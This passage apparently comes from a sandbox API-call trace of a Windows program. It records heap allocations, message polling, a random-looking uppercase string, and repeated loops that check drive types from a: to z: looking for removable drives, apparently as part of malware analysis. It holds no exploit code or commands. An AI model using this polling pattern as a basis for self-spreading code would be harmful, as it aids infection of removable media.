hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0206.551] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0206.551] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0206.551] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0206.551] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0206.551] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0206.552] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0206.552] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0206.552] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0206.552] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0206.552] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0206.552] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0206.552] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.552] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0206.552] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0206.552] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7e0 [0206.552] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326120 [0206.552] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0206.552] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0206.552] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0206.552] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0206.552] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326120 | out: hHeap=0x12c0000) returned 1 [0206.552] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0206.552] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0206.552] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e640 [0206.553] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.553] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e640 | out: hHeap=0x12c0000) returned 1 [0206.553] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.553] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0206.553] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0206.553] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0206.553] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0206.553] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0206.553] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0206.553] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0206.553] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0206.553] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0206.553] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0206.553] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0206.553] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0206.553] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0206.553] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7e0 [0206.553] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0206.554] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0206.554] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0206.554] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0206.554] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd370 [0206.554] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0206.554] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.554] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0206.554] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0206.554] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0206.554] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0206.554] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0206.554] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0206.554] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0206.554] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0206.554] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0206.554] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0206.555] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0206.555] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0206.555] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0206.555] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0206.555] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0206.555] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0206.555] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0206.556] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0206.556] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0206.556] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0206.557] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0206.557] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0206.557] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0206.557] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0206.557] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0206.558] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0206.558] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0206.558] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0206.558] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0206.559] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0206.559] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0206.559] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0206.559] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0206.559] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0206.559] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0206.559] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0206.560] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0206.560] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0206.560] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0206.560] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0206.560] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0206.560] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0206.560] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0206.560] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0206.560] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0206.560] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0206.560] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0206.560] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0206.561] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0206.561] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0206.561] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.561] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0206.561] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0206.561] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0206.561] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f40 [0206.561] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0206.561] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0206.561] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0206.561] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0206.561] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f40 | out: hHeap=0x12c0000) returned 1 [0206.561] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0206.561] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0206.561] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e000 [0206.561] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.561] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e000 | out: hHeap=0x12c0000) returned 1 [0206.561] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.561] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0206.562] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0206.562] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0206.562] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0206.562] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0206.562] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0206.562] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0206.562] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0206.562] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0206.562] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0206.562] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0206.562] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0206.562] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0206.562] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0206.562] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318de0 [0206.562] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0206.562] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318de0 | out: hHeap=0x12c0000) returned 1 [0206.562] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0206.562] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd370 [0206.562] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0206.562] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.562] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0206.562] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0206.562] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0206.563] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0206.563] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0206.563] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0206.563] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0206.563] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0206.563] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0206.563] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0206.563] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0206.563] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0206.563] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0206.563] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0206.563] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0206.563] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0206.564] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0206.564] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0206.564] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0206.564] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0206.564] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0206.564] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0206.564] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0206.565] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0206.565] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0206.565] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0206.565] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0206.565] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0206.565] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0206.565] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0206.566] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0206.566] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0206.566] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0206.566] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0206.566] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0206.566] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0206.567] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0206.567] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0206.567] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0206.567] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0206.567] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0206.567] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0206.567] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0206.567] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0206.567] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0206.567] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0206.567] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0206.567] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0206.567] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0206.567] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0206.567] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.567] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0206.567] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0206.567] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0206.568] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325ea0 [0206.568] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0206.568] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0206.568] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0206.568] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0206.568] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325ea0 | out: hHeap=0x12c0000) returned 1 [0206.568] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0206.568] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0206.568] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0206.568] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.568] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0206.568] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.568] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0206.568] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0206.568] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0206.568] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0206.568] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0206.568] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0206.568] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0206.568] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0206.568] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0206.569] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0206.569] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0206.569] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0206.569] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0206.569] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef840 [0206.569] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0206.569] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0206.569] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0206.569] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0206.569] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0206.569] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0206.569] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.569] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0206.569] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0206.569] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0206.569] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0206.569] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0206.569] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0206.569] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0206.569] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0206.569] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0206.569] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0206.569] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0206.569] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0206.569] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0206.570] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0206.570] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0206.570] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0206.570] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0206.570] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0206.570] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0206.570] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0206.571] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0206.571] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0206.571] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0206.571] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0206.571] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0206.571] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0206.572] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0206.572] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0206.572] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0206.572] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0206.572] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0206.572] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0206.572] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0206.573] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0206.573] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0206.573] 